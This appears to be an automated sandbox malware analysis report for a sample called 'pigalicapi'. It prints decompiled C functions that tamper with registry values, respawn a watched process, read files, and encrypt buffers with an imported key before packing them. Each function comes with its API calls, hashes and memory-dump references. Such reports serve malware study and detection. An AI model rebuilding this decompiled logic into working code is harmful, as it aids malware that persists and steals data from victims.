Opcode ID: a8bd464f4d936ea84497b4a3b5090fc0ccf57da3e861e1b2947b34a05145dab3
Instruction ID: 54b18a4f2b3e33a05ee1f4151fd5a213940033f57bc27f37367b4d6c6db071af
Opcode Fuzzy Hash: a8bd464f4d936ea84497b4a3b5090fc0ccf57da3e861e1b2947b34a05145dab3
Instruction Fuzzy Hash: 25410DB1E40208EBEF04DF94CD85BEEBBB5EB48705F14815AE6067B281D7759A40CF64

Uniqueness

Uniqueness Score: -1.00%

Function 024E5E30 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 79
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E024E5E30(signed char _a4) {
				char* _v8;
				char _v9;
				void* _v16;
				void* _v20;
				char* _v24;
				int _v28;
				signed int _v29;
				int _v36;
				char _v68;
				int _v72;
				char* _t31;
				long _t33;
				long _t37;
				char* _t45;

				_v9 = 0;
				_t31 =  *0x24f18a0; // 0x24f3b88
				_v8 = _t31;
				_t45 =  *0x24f1894; // 0x24f3fc4
				_v24 = _t45;
				_v16 = 0x80000001;
				if(( *0x24f435a & 0x000000ff) != 0) {
					_v16 = 0x80000002;
				}
				_v20 = 0;
				_t33 = RegOpenKeyExA(_v16, _v8, 0, 0xf003f,  &_v20); // executed
				if(_t33 == 0) {
					_v36 = 0x20;
					_v28 = 0x20;
					_v29 = 0;
					_t37 = RegQueryValueExA(_v20, _v24, 0, 0,  &_v68,  &_v28); // executed
					if(_t37 == 0 && _v28 == 0x10) {
						_v29 = 1;
						if((_a4 & 0x000000ff) != 0) {
							RegDeleteValueA(_v20, _v24);
						}
					}
					_t48 = _v29 & 0x000000ff;
					if((_v29 & 0x000000ff) == 0) {
						_v72 = 0x10;
						E024E9BD0(_t48,  &_v68, 0x10);
						RegSetValueExA(_v20, _v24, 0, 3,  &_v68, 0x10);
						_v9 = 1;
					}
					RegCloseKey(_v20); // executed
				}
				return _v9;
			}

0x024e5e36
0x024e5e3a
0x024e5e3f
0x024e5e42
0x024e5e48
0x024e5e4b
0x024e5e5b
0x024e5e5d
0x024e5e5d
0x024e5e64
0x024e5e7e
0x024e5e86
0x024e5e8c
0x024e5e93
0x024e5e9a
0x024e5eb2
0x024e5eba
0x024e5ec2
0x024e5ecc
0x024e5ed6
0x024e5ed6
0x024e5ecc
0x024e5edc
0x024e5ee2
0x024e5ee4
0x024e5ef1
0x024e5f0b
0x024e5f11
0x024e5f11
0x024e5f19
0x024e5f19
0x024e5f25

APIs

RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,000F003F,00000000), ref: 024E5E7E
RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,?,00000020), ref: 024E5EB2
RegDeleteValueA.ADVAPI32(00000000,?), ref: 024E5ED6
RegSetValueExA.ADVAPI32(00000000,?,00000000,00000003,?,00000010), ref: 024E5F0B
RegCloseKey.KERNEL32(00000000), ref: 024E5F19

Strings

, xrefs: 024E5E8C
, xrefs: 024E5E93

Memory Dump Source

Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true

Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd

Similarity

API ID: Value$CloseDeleteOpenQuery
String ID: $
API String ID: 647993726-227171996
Opcode ID: a662877f9cdc3c9e1b4ab369a60465522b854d15ce0f607cce53da906f2af05e
Instruction ID: 29330670a24967ac740748ae2846134ddc2b1297197f7d0006a45393c2433b00
Opcode Fuzzy Hash: a662877f9cdc3c9e1b4ab369a60465522b854d15ce0f607cce53da906f2af05e
Instruction Fuzzy Hash: E2315070E40209EBEF04DFE4D895BBFBBB9AB44709F14444DEA05AB281D7B55610CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 024E4AC0 Relevance: 12.1, APIs: 8, Instructions: 68
sleepsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E024E4AC0(intOrPtr _a4) {
				intOrPtr _v8;
				long _v12;
				intOrPtr _v16;
				void* _v20;
				intOrPtr _t31;
				void* _t50;

				_v8 = _a4;
				if(_v8 != 0) {
					__imp__CoInitialize(0);
					L2:
					while(1) {
						if( *((intOrPtr*)(_v8 + 8)) <= 0 || WaitForSingleObject( *(_v8 + 0x24), 0x64) != 0x102) {
							L6:
							Sleep(0x1388); // executed
							continue;
						}
						EnterCriticalSection(_v8 + 0xc);
						_v20 = 0;
						_v12 = 0;
						_t31 = E024E8250( *((intOrPtr*)(_v8 + 4)),  *((intOrPtr*)(_v8 + 8)),  &_v20,  &_v12); // executed
						_t50 = _t50 + 0x10;
						_v16 = _t31;
						LeaveCriticalSection(_v8 + 0xc);
						if(_v16 <= 0) {
							goto L6;
						}
						E024E62B0(_v20, _v16); // executed
						VirtualFree(_v20, 0, 0x8000); // executed
						SetEvent( *(_v8 + 0x24));
						__imp__CoUninitialize();
						goto L8;
					}
				}
				L8:
				return 0;
			}

0x024e4ac9
0x024e4ad0
0x024e4ad8
0x00000000
0x024e4ade
0x024e4ae5
0x024e4b80
0x024e4b85
0x00000000
0x024e4b85
0x024e4b08
0x024e4b0e
0x024e4b15
0x024e4b32
0x024e4b37
0x024e4b3a
0x024e4b44
0x024e4b4e
0x00000000
0x00000000
0x024e4b58
0x024e4b6b
0x024e4b78
0x024e4b90
0x00000000
0x024e4b90
0x024e4ade
0x024e4b96
0x024e4b9b

APIs

CoInitialize.OLE32(00000000), ref: 024E4AD8
WaitForSingleObject.KERNEL32(?,00000064), ref: 024E4AF4
EnterCriticalSection.KERNEL32(-0000000C), ref: 024E4B08
LeaveCriticalSection.KERNEL32(-0000000C), ref: 024E4B44
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 024E4B6B
SetEvent.KERNEL32(?), ref: 024E4B78
Sleep.KERNEL32(00001388), ref: 024E4B85
CoUninitialize.OLE32 ref: 024E4B90

Memory Dump Source

Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true

Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd

Similarity

API ID: CriticalSection$EnterEventFreeInitializeLeaveObjectSingleSleepUninitializeVirtualWait
String ID:
API String ID: 3462651527-0
Opcode ID: 13fe20db4617c71ba9b31debdfcad7de3c316911b593f31a6cde0f80840fe585
Instruction ID: c7711dc9cd757cf12494a0aaaad94669e6dbc768ac01e749c188a80846d24f2d
Opcode Fuzzy Hash: 13fe20db4617c71ba9b31debdfcad7de3c316911b593f31a6cde0f80840fe585
Instruction Fuzzy Hash: 41215E75D40208EFEB04DBD4D988FAEB7B9EB48302F108949E506AB241C735DA50CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00401A9C Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 161
windowCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00401A9C(struct HWND__* _a4, int _a8, signed int _a12, signed int _a16) {
				void* _v12;
				void* _v20;
				void* _v24;
				void* _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				int _v60;
				struct HMENU__* _v64;
				int _t52;
				int _t53;
				struct HWND__* _t59;
				signed int _t66;
				signed int _t92;
				void* _t100;

				_t52 = _a8;
				if(_t52 == 5) {
					if(_a12 != 1) {
						_t59 = GetDlgItem(_a4, 0x3e9);
						_v48 = 1;
						_v52 = _a16 >> 0x00000010 & 0x0000ffff;
						_v56 = _a16 & 0x0000ffff;
						_v60 = 0;
						_v64 = 0;
						 *(_t100 - 8) = _t59;
						MoveWindow(??, ??, ??, ??, ??, ??);
					}
					goto L29;
				} else {
					if(_t52 > 5) {
						if(_t52 == 0x10) {
							DestroyWindow(_a4);
							goto L29;
						} else {
							if(_t52 == 0x111) {
								_t66 = _a12 & 0x0000ffff;
								if(_t66 == 0x236e) {
									E00401879(_a4, 0);
									goto L25;
								} else {
									if(_t66 > 0x236e) {
										if(_t66 == 0x236f) {
											PostMessageA(_a4, 0x10, 0, 0);
											goto L25;
										} else {
											if(_t66 == 0x2370) {
												E00401879(_a4, 1);
												goto L25;
											} else {
											}
										}
									} else {
										if(_t66 == 0x236d) {
											MessageBoxA(0, "File Editor for Windows!\nCreated using the Win32 API", "About...", 0);
											L25:
										} else {
										}
									}
								}
								goto L29;
							} else {
								if(_t52 == 7) {
									 *(_t100 - 8) = GetDlgItem(_a4, 0x3e9);
									SetFocus(??);
									goto L29;
								} else {
									goto L28;
								}
							}
						}
					} else {
						if(_t52 == 1) {
							CreateWindowExA(0, "EDIT", 0x41f060, 0x50301004, 0x80000000, 0x80000000, 0x80000000, 0x80000000, _a4, 0x3e9, GetModuleHandleA(0), 0); // executed
							_t92 = GetStockObject(0x11);
							_v52 = 1;
							_v56 = _t92;
							_v60 = 0x30;
							_v64 = 0x3e9;
							 *((intOrPtr*)(_t100 - 0xffffffffffffffd0)) = _a4;
							SendDlgItemMessageA(??, ??, ??, ??, ??); // executed
							goto L29;
						} else {
							if(_t52 == 2) {
								PostQuitMessage(0);
								L29:
								_t53 = 0;
							} else {
								L28:
								_t53 = DefWindowProcA(_a4, _a8, _a12, _a16); // executed
							}
						}
					}
				}
				return _t53;
			}

APIs

CreateWindowExA.USER32 ref: 00401B5A
SendDlgItemMessageA.USER32 ref: 00401B97

Strings

About..., xrefs: 00401CB9
File Editor for Windows!Created using the Win32 API, xrefs: 00401CC1
EDIT, xrefs: 00401B46
0, xrefs: 00401B7C

Memory Dump Source

Source File: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd

Similarity

API ID: CreateItemMessageSendWindow
String ID: 0$About...$EDIT$File Editor for Windows!Created using the Win32 API
API String ID: 2461998243-509482549
Opcode ID: 8ec94040c610515bec2416d0adaa2c3baf4629c9f06ab549dac859a33765003e
Instruction ID: e85ddbd10a1709dc64db389d43dfdca03f0125780d47bd1fb79a5389fcfd3c42
Opcode Fuzzy Hash: 8ec94040c610515bec2416d0adaa2c3baf4629c9f06ab549dac859a33765003e
Instruction Fuzzy Hash: 4A6118B0508304DFE710EF28D99875E7BE4EB44304F50892EE899DB3A1D379D9859B8B

Uniqueness

Uniqueness Score: -1.00%

Function 024E77B0 Relevance: 10.6, APIs: 7, Instructions: 80
sleepCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E024E77B0(void** _a4) {
				void** _v8;
				intOrPtr _v12;
				long _v16;
				long _v20;
				long _v24;
				void** _v28;
				int _t37;
				void* _t40;
				void* _t60;

				if(_a4 != 0) {
					__imp__CoInitialize(0);
					_v12 = 0x96;
					_v16 = 0x1388;
					_v8 = _a4;
					if( *_v8 != 0) {
						_v20 = 0;
						while(_v20 < 0x96) {
							_v24 = 0;
							_t37 = GetExitCodeProcess(_v8[3],  &_v24); // executed
							if(_t37 == 0) {
							} else {
								if(_v24 != 0x103) {
									CloseHandle(_v8[3]);
									Sleep(0x7530);
									_t40 = E024E2070( *_v8);
									_t60 = _t60 + 4;
									_v8[3] = _t40;
									if(_v8[3] != 0) {
										_v20 = _v20 + 1;
										if((_v8[2] & 0x00000004) != 0) {
											E024E2510(_v8[3], 0x24ee290);
											_t60 = _t60 + 8;
										}
										goto L11;
									} else {
									}
								} else {
									Sleep(0x1388); // executed
									L11:
									continue;
								}
							}
							break;
						}
						VirtualFree( *_v8, 0, 0x8000);
						_v28 = _v8;
						E024E97C0(_v28);
					}
					__imp__CoUninitialize();
				}
				return 0;
			}

0x024e77ba
0x024e77c2
0x024e77c8
0x024e77cf
0x024e77d9
0x024e77e2
0x024e77e8
0x024e77ef
0x024e77fc
0x024e780e
0x024e7816
0x024e7818
0x024e781f
0x024e7835
0x024e7840
0x024e784c
0x024e7851
0x024e7857
0x024e7861
0x024e786d
0x024e7879
0x024e7887
0x024e788c
0x024e788c
0x00000000
0x00000000
0x024e7863
0x024e7821
0x024e7826
0x024e788f
0x00000000
0x024e7893
0x024e781f
0x00000000
0x024e7816
0x024e78a5
0x024e78ae
0x024e78b5
0x024e78ba
0x024e78bd
0x024e78bd
0x024e78c8

APIs

CoInitialize.OLE32(00000000), ref: 024E77C2
GetExitCodeProcess.KERNEL32 ref: 024E780E
Sleep.KERNEL32(00001388), ref: 024E7826
CloseHandle.KERNEL32(00001388), ref: 024E7835
Sleep.KERNEL32(00007530), ref: 024E7840
VirtualFree.KERNEL32(00000096,00000000,00008000), ref: 024E78A5
CoUninitialize.OLE32 ref: 024E78BD

Memory Dump Source

Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true

Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd

Similarity

API ID: Sleep$CloseCodeExitFreeHandleInitializeProcessUninitializeVirtual
String ID:
API String ID: 2326833528-0
Opcode ID: b236fe85807dc6c74fe6c3add8855abe8abcb34b864d697d7e5aebc6b33179af
Instruction ID: 562c16d4a7ff598467d10f7099736a88ac51943d50f28bd35f37b22c7482388e
Opcode Fuzzy Hash: b236fe85807dc6c74fe6c3add8855abe8abcb34b864d697d7e5aebc6b33179af
Instruction Fuzzy Hash: D8315C74D00209EBFF04CFD4D984BAEB7B1BB58316F10859AE416AB381D7759A41CF91

Uniqueness

Uniqueness Score: -1.00%

Function 024E5CD0 Relevance: 10.6, APIs: 7, Instructions: 72
filememorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E024E5CD0(CHAR* _a4) {
				long _v8;
				void* _v12;
				long _v16;
				void* _v20;
				long _v24;
				void* _t29;
				void* _t34;

				_v8 = 0;
				if(_a4 != 0 && lstrlenA(_a4) >= 4) {
					_t29 = CreateFileA(_a4, 0x80000000, 7, 0, 3, 0x80, 0); // executed
					_v12 = _t29;
					if(_v12 != 0xffffffff) {
						_v16 = GetFileSize(_v12, 0);
						if(_v16 > 0) {
							_t34 = VirtualAlloc(0, _v16, 0x3000, 4); // executed
							_v20 = _t34;
							if(_v20 != 0) {
								_v24 = 0;
								ReadFile(_v12, _v20, _v16,  &_v24, 0); // executed
								if(_v24 == _v16) {
									_v8 = E024E16F0(_v20, _v16);
								}
								VirtualFree(_v20, 0, 0x8000); // executed
							}
						}
						FindCloseChangeNotification(_v12); // executed
					}
				}
				return _v8;
			}

0x024e5cd6
0x024e5ce1
0x024e5d10
0x024e5d16
0x024e5d1d
0x024e5d2f
0x024e5d36
0x024e5d45
0x024e5d4b
0x024e5d52
0x024e5d54
0x024e5d6d
0x024e5d79
0x024e5d8b
0x024e5d8b
0x024e5d99
0x024e5d99
0x024e5d52
0x024e5da3
0x024e5da3
0x024e5d1d
0x024e5daf

APIs

lstrlenA.KERNEL32(00000000), ref: 024E5CEB
CreateFileA.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 024E5D10
GetFileSize.KERNEL32(000000FF,00000000), ref: 024E5D29
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 024E5D45
ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 024E5D6D
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 024E5D99
FindCloseChangeNotification.KERNEL32(000000FF), ref: 024E5DA3

Memory Dump Source

Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true

Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd

Similarity

API ID: File$Virtual$AllocChangeCloseCreateFindFreeNotificationReadSizelstrlen
String ID:
API String ID: 443218420-0
Opcode ID: 961ca06a1fd4ee28c6d628d37122f0dac2662f5299c2497f59e59df4c74cca4a
Instruction ID: 7abee207d3ce412a139c8d6b99f328abf756c9f6998c0a9d24819d697359bcf8
Opcode Fuzzy Hash: 961ca06a1fd4ee28c6d628d37122f0dac2662f5299c2497f59e59df4c74cca4a
Instruction Fuzzy Hash: 2E21EC75E40208FBEF14DFE4D889FAEB775AB48705F108549E615AB2C1C7749A40CF50

Uniqueness

Uniqueness Score: -1.00%

Function 024E5B50 Relevance: 8.9, APIs: 7, Instructions: 124
stringmemoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E024E5B50(CHAR* _a4, char* _a8, intOrPtr* _a12, intOrPtr* _a16) {
				void* _v8;
				void* _v12;
				signed int _v16;
				long _v20;
				void* _v24;
				int _v28;
				int _v32;
				char* _v36;
				char* _v40;
				void* _v44;
				void* _t69;

				_v8 = 0;
				if(_a4 != 0 && _a8 != 0 && _a12 != 0) {
					_v32 = lstrlenA(_a8);
					_v28 = lstrlenA(_a4);
					_v24 = 0;
					_v16 = 0;
					while(_v24 < _v28) {
						_v36 = StrStrIA( &(_a4[_v24]), _a8);
						if(_v36 != 0) {
							_v16 = _v16 + 1;
							_v24 = _v36 - _a4 + _v32;
							continue;
						}
						break;
					}
					_v20 = _v16 * 0x28;
					_t69 = VirtualAlloc(0, _v20, 0x3000, 4); // executed
					_v12 = _t69;
					if(_v12 != 0) {
						_v24 = 0;
						_v16 = 0;
						while(_v24 < _v28) {
							_v40 = StrStrIA( &(_a4[_v24]), _a8);
							if(_v40 != 0) {
								lstrcpynA(_v12 + _v16 * 0x28,  &(_a4[_v24]), _v40 -  &(_a4[_v24]) + 1);
								_v24 = _v40 - _a4 + _v32;
								_v16 = _v16 + 1;
								_v8 = _v8 + 1;
								 *_a12 = _v12;
								continue;
							}
							break;
						}
						if(_a16 != 0) {
							_v44 = VirtualAlloc(0, _v20, 0x3000, 4);
							if(_v44 != 0) {
								E024E7B70(_v44, _v12, _v20);
								 *_a16 = _v44;
							}
						}
					}
				}
				return _v8;
			}

0x024e5b56
0x024e5b61
0x024e5b85
0x024e5b92
0x024e5b95
0x024e5b9c
0x024e5ba3
0x024e5bbc
0x024e5bc3
0x024e5bcb
0x024e5bd7
0x00000000
0x024e5bde
0x00000000
0x024e5bc3
0x024e5be6
0x024e5bf6
0x024e5bfc
0x024e5c03
0x024e5c09
0x024e5c10
0x024e5c17
0x024e5c30
0x024e5c37
0x024e5c59
0x024e5c68
0x024e5c71
0x024e5c7a
0x024e5c87
0x00000000
0x024e5c87
0x00000000
0x024e5c37
0x024e5c8f
0x024e5ca4
0x024e5cab
0x024e5cb9
0x024e5cc7
0x024e5cc7
0x024e5cab
0x024e5c8f
0x024e5c03
0x024e5ccf

APIs

lstrlenA.KERNEL32(00000000), ref: 024E5B7F
lstrlenA.KERNEL32(00000000), ref: 024E5B8C
StrStrIA.SHLWAPI(00000000,00000000), ref: 024E5BB6
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 024E5BF6
StrStrIA.SHLWAPI(00000000,00000000), ref: 024E5C2A
lstrcpynA.KERNEL32(00000000,00000000,-00000001), ref: 024E5C59
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 024E5C9E

Memory Dump Source

Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true

Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd

Similarity

API ID: AllocVirtuallstrlen$lstrcpyn
String ID:
API String ID: 808621155-0
Opcode ID: f9f87b7b0a5115113eea2681a4aac114e2b605819b7fc69a9ce76428be69d4ae
Instruction ID: 65b4e075ef6a2bc7bdf16286d7535b14676f65e4a91294fa701fabaf0723be8b
Opcode Fuzzy Hash: f9f87b7b0a5115113eea2681a4aac114e2b605819b7fc69a9ce76428be69d4ae
Instruction Fuzzy Hash: 1A51B775D00209EFEF04CF94C594BAEBBB5AF48309F14855AE506AB344C375AA81CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 024E6CF0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E024E6CF0() {
				char _v5;
				void* _v12;
				void* _v16;
				int _v20;
				int _v24;
				long _v28;
				char _v60;
				long _t21;
				long _t24;
				char* _t26;
				char* _t30;
				char* _t32;

				_v5 = 0;
				_v12 = 0x80000001;
				if(( *0x24f435a & 0x000000ff) != 0) {
					_v12 = 0x80000002;
				}
				_v16 = 0;
				_t32 =  *0x24f18a0; // 0x24f3b88
				_t21 = RegOpenKeyExA(_v12, _t32, 0, 0xf003f,  &_v16); // executed
				if(_t21 == 0) {
					_v24 = 0x20;
					_v20 = 3;
					_t30 =  *0x24f1890; // 0x24f3fa6
					_t24 = RegQueryValueExA(_v16, _t30, 0,  &_v20,  &_v60,  &_v24); // executed
					_v28 = _t24;
					if(_v28 == 0) {
						_v5 = 1;
						_t26 =  *0x24f1890; // 0x24f3fa6
						RegDeleteValueA(_v16, _t26);
					}
					RegCloseKey(_v16);
				}
				return _v5;
			}

0x024e6cf6
0x024e6cfa
0x024e6d0a
0x024e6d0c
0x024e6d0c
0x024e6d13
0x024e6d25
0x024e6d30
0x024e6d38
0x024e6d3a
0x024e6d41
0x024e6d56
0x024e6d61
0x024e6d67
0x024e6d6e
0x024e6d70
0x024e6d74
0x024e6d7e
0x024e6d7e
0x024e6d88
0x024e6d88
0x024e6d94

APIs

RegOpenKeyExA.KERNEL32(80000001,024F3B88,00000000,000F003F,00000000), ref: 024E6D30
RegQueryValueExA.KERNEL32(00000000,024F3FA6,00000000,00000003,?,00000020), ref: 024E6D61
RegDeleteValueA.ADVAPI32(00000000,024F3FA6), ref: 024E6D7E
RegCloseKey.ADVAPI32(00000000), ref: 024E6D88

Strings

, xrefs: 024E6D3A

Memory Dump Source

Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true

Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd

Similarity

API ID: Value$CloseDeleteOpenQuery
String ID:
API String ID: 647993726-3916222277
Opcode ID: 2febf2621d4657ba6ac14d690b2f52a0e6f01affb2ad4bdd81366166c8cb26fa
Instruction ID: 29800b78a04dcde9afe026b7e7d235db51e0e54c9053a4636f57ba93edb2c010
Opcode Fuzzy Hash: 2febf2621d4657ba6ac14d690b2f52a0e6f01affb2ad4bdd81366166c8cb26fa
Instruction Fuzzy Hash: B8113AB5D40209EFEF04DFE4D888BBFBBB8AB48704F148549E615AB241D7B59614CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 024E8370 Relevance: 7.7, APIs: 6, Instructions: 191
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E024E8370(intOrPtr _a4, long _a8, char _a12, intOrPtr _a16) {
				long _v8;
				void* _v12;
				void* _v16;
				long _v20;
				long _v24;
				intOrPtr _v28;
				void* _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				intOrPtr* _v56;
				long _v60;
				void* _t79;
				void* _t80;
				void* _t85;
				void* _t90;
				void* _t94;

				_v8 = 0;
				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0 || _a16 < _a8) {
					L17:
					return _v8;
				} else {
					_t79 = VirtualAlloc(0, 0x1000, 0x3000, 4); // executed
					_v16 = _t79;
					_t80 = VirtualAlloc(0, 0x1000, 0x3000, 4); // executed
					_v12 = _t80;
					if(_v16 != 0 && _v12 != 0) {
						_v24 = 0x1000;
						_v20 = 0x1000;
						_t85 = E024E8800(_v16,  &_v24, _v12,  &_v20, 0x24f3378, 0x94); // executed
						if(_t85 != 0) {
							_t21 = _a8 + 0x10; // 0x1010
							_v28 = _v20 + _t21;
							_t170 = _a16 - _v28;
							if(_a16 >= _v28) {
								_v40 = E024E8770(_t170, 0xa);
								_v36 = E024E87D0(0xffffffff);
								_t90 = VirtualAlloc(0, _a8, 0x3000, 4); // executed
								_v32 = _t90;
								if(_v32 != 0) {
									_v44 = _a8;
									E024E7B70(_v32, _a4, _a8);
									_t94 = E024E8970(_v32,  &_v44, _v16, _v24); // executed
									if(_t94 != 0) {
										_v48 = _a12;
										E024E85D0( &_v48,  &_v40, 4);
										E024E85D0( &_v48,  &_v36, 4);
										_v60 = 0;
										_v56 = _v48;
										E024E85D0( &_v48,  &_v60, 4);
										_v52 = _v48;
										E024E85D0( &_v48,  &_v20, 4);
										E024E85D0( &_v48, _v12, _v20);
										E024E8650(_v36, _v52, _v48 - _v52, _v36);
										E024E85D0( &_v48, _v32, _v44);
										 *_v56 = E024E16F0(_a12 + 0xc, _v48 - _a12 + 0xc);
										_v8 = _v48 - _a12;
									}
									VirtualFree(_v32, 0, 0x8000); // executed
								}
							}
						}
					}
					if(_v16 != 0) {
						VirtualFree(_v16, 0, 0x8000); // executed
					}
					if(_v12 != 0) {
						VirtualFree(_v12, 0, 0x8000); // executed
					}
					goto L17;
				}
			}

0x024e8376
0x024e8381
0x024e85c0
0x024e85c6
0x024e83b1
0x024e83bf
0x024e83c5
0x024e83d6
0x024e83dc
0x024e83e3
0x024e83f3
0x024e83fa
0x024e841b
0x024e8425
0x024e8431
0x024e8435
0x024e843b
0x024e843e
0x024e844e
0x024e845b
0x024e846b
0x024e8471
0x024e8478
0x024e8481
0x024e8490
0x024e84a8
0x024e84b2
0x024e84bb
0x024e84c8
0x024e84da
0x024e84e2
0x024e84ec
0x024e84f9
0x024e8504
0x024e8511
0x024e8525
0x024e853c
0x024e8550
0x024e8576
0x024e857e
0x024e857e
0x024e858c
0x024e858c
0x024e8478
0x024e843e
0x024e8425
0x024e8596
0x024e85a3
0x024e85a3
0x024e85ad
0x024e85ba
0x024e85ba
0x00000000
0x024e85ad

APIs

VirtualAlloc.KERNEL32(00000000,00001000,00003000,00000004), ref: 024E83BF
VirtualAlloc.KERNEL32(00000000,00001000,00003000,00000004), ref: 024E83D6
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 024E846B

Part of subcall function 024E8970: CryptAcquireContextA.ADVAPI32(00000000,024EC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 024E89BF
Part of subcall function 024E8970: GetLastError.KERNEL32 ref: 024E89C9
Part of subcall function 024E8970: CryptAcquireContextA.ADVAPI32(00000000,024EC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 024E89F8
Part of subcall function 024E8970: CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000001,00000000), ref: 024E8A1F
Part of subcall function 024E8970: CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 024E8A41
Part of subcall function 024E8970: CryptDestroyKey.ADVAPI32(00000000), ref: 024E8A4E
Part of subcall function 024E8970: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 024E8A5A

VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 024E858C
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 024E85A3
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 024E85BA

Part of subcall function 024E8800: CryptAcquireContextA.ADVAPI32(00000000,024EC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,024E8420,00000000,00001000,00000000), ref: 024E883B
